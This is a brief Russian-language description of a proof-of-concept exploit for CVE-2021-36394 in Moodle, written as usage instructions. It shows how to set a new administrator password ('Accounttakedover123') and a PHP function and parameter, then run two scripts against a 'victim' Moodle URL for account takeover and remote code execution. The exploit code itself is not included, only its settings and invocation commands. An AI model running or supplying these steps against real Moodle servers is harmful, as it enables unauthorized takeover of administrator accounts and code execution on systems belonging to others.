
Эксплойт для проверки концепции уязвимости CVE-2021-36394 в Moodle, позволяющий перехватить пароль администратора и удалённо выполнить код с помощью пользовательских PHP-функций.
Пользовательский код
$newpassword = "Accounttakedover123";
Затем выполнить:
$ CVE2021-36394.php http://victim/path_to_moodle
Пользовательский код
$function = "header"; $param = "Hacked: by0d0ff9";
Затем выполнить:
$ CVE2021-36394_RCE.php http://victim/path_to_moodle